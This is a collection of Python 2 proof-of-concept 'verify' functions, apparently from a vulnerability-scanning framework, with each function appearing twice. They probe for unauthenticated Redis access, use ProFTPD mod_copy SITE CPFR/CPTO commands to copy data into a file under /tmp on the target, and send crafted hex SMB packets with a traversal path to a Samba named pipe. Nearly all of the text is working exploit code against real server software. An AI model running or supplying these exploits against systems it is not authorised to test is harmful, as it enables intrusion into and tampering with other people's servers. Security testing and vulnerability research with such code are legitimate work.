def verify(cls, args): ip_addr = transform_target_ip(args['options']['target']) p = args['options']['port'] if args['options']['verbose']: print '[*] Connect Redis: redis-cli -h ' + ip_addr + ' -p' + str(p) try: r = redis.Redis(host=ip_addr, port=p, db=0) ret1 = r.set('name', 'stefan') ret2 = r.get('name') if ret1 & (ret2 in 'stefan'): args['success'] = True args['poc_ret']['vul_url'] = ip_addr + ':' + str(p) except Exception, e: if args['options']['verbose']: print str(e) args['success'] = False return args
def verify(cls, args): ip_addr = transform_target_ip(args["options"]["target"]) p = args["options"]["port"] if args["options"]["verbose"]: print "[*] Connect Redis: redis-cli -h " + ip_addr + " -p" + str(p) try: r = redis.Redis(host=ip_addr, port=p, db=0) ret1 = r.set("name", "stefan") ret2 = r.get("name") if ret1 & (ret2 in "stefan"): args["success"] = True args["poc_ret"]["vul_url"] = ip_addr + ":" + str(p) except Exception, e: if args["options"]["verbose"]: print str(e) args["success"] = False return args
def verify(cls, args): ip = http.transform_target_ip(http.normalize_url(args['options']['target'])) if args['options']['verbose']: print '[*] {} Connecting...'.format(ip) tn = telnetlib.Telnet(ip, port=21, timeout=15) tn.write('site help\r\n') tn.write('quit\n') status = tn.read_all() if 'CPTO' in status and 'CPFR' in status: if args['options']['verbose']: print '[*] Find CPTO & CPFR' tn = telnetlib.Telnet(ip, port=21, timeout=15) filename_tmp = '/tmp/evi1m0_%s.sh'%random.randint(1, 1000) tn.write('site cpto evi1m0@beebeeto\n') tn.write('site cpfr /proc/self/fd/3\n') tn.write('site cpto %s\n'%filename_tmp) tn.write('quit\n') result = tn.read_all() if 'Copy successful' in result: args['success'] = True args['poc_ret']['vul_target'] = ip args['poc_ret']['filename'] = filename_tmp return args
def verify(cls, args): ip = http.transform_target_ip( http.normalize_url(args['options']['target'])) if args['options']['verbose']: print '[*] {} Connecting...'.format(ip) tn = telnetlib.Telnet(ip, port=21, timeout=15) tn.write('site help\r\n') tn.write('quit\n') status = tn.read_all() if 'CPTO' in status and 'CPFR' in status: if args['options']['verbose']: print '[*] Find CPTO & CPFR' tn = telnetlib.Telnet(ip, port=21, timeout=15) filename_tmp = '/tmp/evi1m0_%s.sh' % random.randint(1, 1000) tn.write('site cpto evi1m0@beebeeto\n') tn.write('site cpfr /proc/self/fd/3\n') tn.write('site cpto %s\n' % filename_tmp) tn.write('quit\n') result = tn.read_all() if 'Copy successful' in result: args['success'] = True args['poc_ret']['vul_target'] = ip args['poc_ret']['filename'] = filename_tmp return args
def verify(cls, args): ip = http.transform_target_ip( http.normalize_url(args['options']['target'])) port = args['options']['port'] payload = [ ('00000045ff534d427200000000000008000000000000000000000000ffff00000000000000220' '0024e54204c4d20302e31320002534d4220322e3030320002534d4220322e3f3f3f00' ).decode('hex'), ('00000088ff534d427300000000080048000000000000000000000000ffffc42b000000000cff0' '0000000f0020001000000000042000000000044c000804d00604006062b0601050502a0363034' 'a00e300c060a2b06010401823702020aa22204204e544c4d5353500001000000050288a000000' '000000000000000000000000000556e69780053616d626100' ).decode('hex'), ('00000096ff534d427300000000080048000000000000000000000000ffffc42b010800000cff0' '0000000f0020001000000000050000000000044c000805b00a14e304ca24a04484e544c4d5353' '50000300000000000000480000000000000048000000000000004000000000000000400000000' '8000800400000000000000048000000050288a04e0055004c004c00556e69780053616d626100' ).decode('hex'), '00000047ff534d427500000000080048000000000000000000000000ffffc42b0108000004ff000000000001001c0000' .decode('hex'), ('0000005cff534d42a2000000001801480000000000000000000000000108c42b0108000018ff0' '00000000800160000000000000003000000000000000000000080000000010000000100000040' '000000020000000009005c62726f7773657200').decode('hex'), ('00000092ff534d4225000000000801480000000000000000000000000108c42b0108000010000' '048000004e0ff0000000000000000000000004a0048004a000200260000404f005c504950455c' '0005000b03100000004800000001000000b810b810000000000100000000000100c84f324b701' '6d30112785a47bf6ee18803000000045d888aeb1cc9119fe808002b10486002000000' ).decode('hex'), ('000000beff534d4225000000000801480000000000000000000000000108c42b0108000010000' '074000004e0ff0000000000000000000000004a0074004a000200260000407b005c504950455c' '00050000031000000074000000010000000000000000002000000002000100000000000000010' '000000000aaaa0e000000000000000e0000005c00410041004100410041005c002e002e005c00' '46004200560000000500000000000000050000005c004600420056000000aaaa0100000000000000' ).decode('hex'), ] def setuserid(userid, data): return data[:32] + userid + data[34:] def settreeid(treeid, data): return data[:28] + treeid + data[30:] def setfid(fid, data): return data[:67] + fid + data[69:] if args['options']['verbose']: print '[*] Connect {}:{}'.format(ip, port) s = socket.socket() s.connect((ip, port)) s.send(payload[0]) s.recv(1024) s.send(payload[1]) data = s.recv(1024) userid = data[32:34] s.send(setuserid(userid, payload[2])) s.recv(1024) data = setuserid(userid, payload[3]) path = '\\\\%s\\IPC$\x00' % ip path = path + (26 - len(path)) * '\x3f' + '\x00' data = data + path s.send(data) data = s.recv(1024) tid = data[28:30] s.send(settreeid(tid, setuserid(userid, payload[4]))) data = s.recv(1024) fid = data[42:44] s.send(setfid(fid, settreeid(tid, setuserid(userid, payload[5])))) s.recv(1024) s.send(setfid(fid, settreeid(tid, setuserid(userid, payload[6])))) data = s.recv(1024) if data[9:13] == '\x00' * 4: print "[+] Looks Vulnerability!" args['success'] = True args['poc_ret']['vulnerability'] = '%s:%d' % (ip, port) return args
def verify(cls, args): ip = http.transform_target_ip(http.normalize_url(args['options']['target'])) port = args['options']['port'] payload = [ ('00000045ff534d427200000000000008000000000000000000000000ffff00000000000000220' '0024e54204c4d20302e31320002534d4220322e3030320002534d4220322e3f3f3f00').decode('hex'), ('00000088ff534d427300000000080048000000000000000000000000ffffc42b000000000cff0' '0000000f0020001000000000042000000000044c000804d00604006062b0601050502a0363034' 'a00e300c060a2b06010401823702020aa22204204e544c4d5353500001000000050288a000000' '000000000000000000000000000556e69780053616d626100').decode('hex'), ('00000096ff534d427300000000080048000000000000000000000000ffffc42b010800000cff0' '0000000f0020001000000000050000000000044c000805b00a14e304ca24a04484e544c4d5353' '50000300000000000000480000000000000048000000000000004000000000000000400000000' '8000800400000000000000048000000050288a04e0055004c004c00556e69780053616d626100').decode('hex'), '00000047ff534d427500000000080048000000000000000000000000ffffc42b0108000004ff000000000001001c0000'.decode('hex'), ('0000005cff534d42a2000000001801480000000000000000000000000108c42b0108000018ff0' '00000000800160000000000000003000000000000000000000080000000010000000100000040' '000000020000000009005c62726f7773657200').decode('hex'), ('00000092ff534d4225000000000801480000000000000000000000000108c42b0108000010000' '048000004e0ff0000000000000000000000004a0048004a000200260000404f005c504950455c' '0005000b03100000004800000001000000b810b810000000000100000000000100c84f324b701' '6d30112785a47bf6ee18803000000045d888aeb1cc9119fe808002b10486002000000').decode('hex'), ('000000beff534d4225000000000801480000000000000000000000000108c42b0108000010000' '074000004e0ff0000000000000000000000004a0074004a000200260000407b005c504950455c' '00050000031000000074000000010000000000000000002000000002000100000000000000010' '000000000aaaa0e000000000000000e0000005c00410041004100410041005c002e002e005c00' '46004200560000000500000000000000050000005c004600420056000000aaaa0100000000000000').decode('hex'), ] def setuserid(userid,data): return data[:32]+userid+data[34:] def settreeid(treeid,data): return data[:28]+treeid+data[30:] def setfid(fid,data): return data[:67]+fid+data[69:] if args['options']['verbose']: print '[*] Connect {}:{}'.format(ip,port) s = socket.socket() s.connect((ip,port)) s.send(payload[0]) s.recv(1024) s.send(payload[1]) data = s.recv(1024) userid = data[32:34] s.send(setuserid(userid,payload[2])) s.recv(1024) data = setuserid(userid,payload[3]) path = '\\\\%s\\IPC$\x00' % ip path = path + (26-len(path))*'\x3f'+'\x00' data = data + path s.send(data) data = s.recv(1024) tid = data[28:30] s.send(settreeid(tid,setuserid(userid,payload[4]))) data = s.recv(1024) fid = data[42:44] s.send(setfid(fid,settreeid(tid,setuserid(userid,payload[5])))) s.recv(1024) s.send(setfid(fid,settreeid(tid,setuserid(userid,payload[6])))) data = s.recv(1024) if data[9:13]=='\x00'*4: print "[+] Looks Vulnerability!" args['success'] = True args['poc_ret']['vulnerability'] = '%s:%d' % (ip, port) return args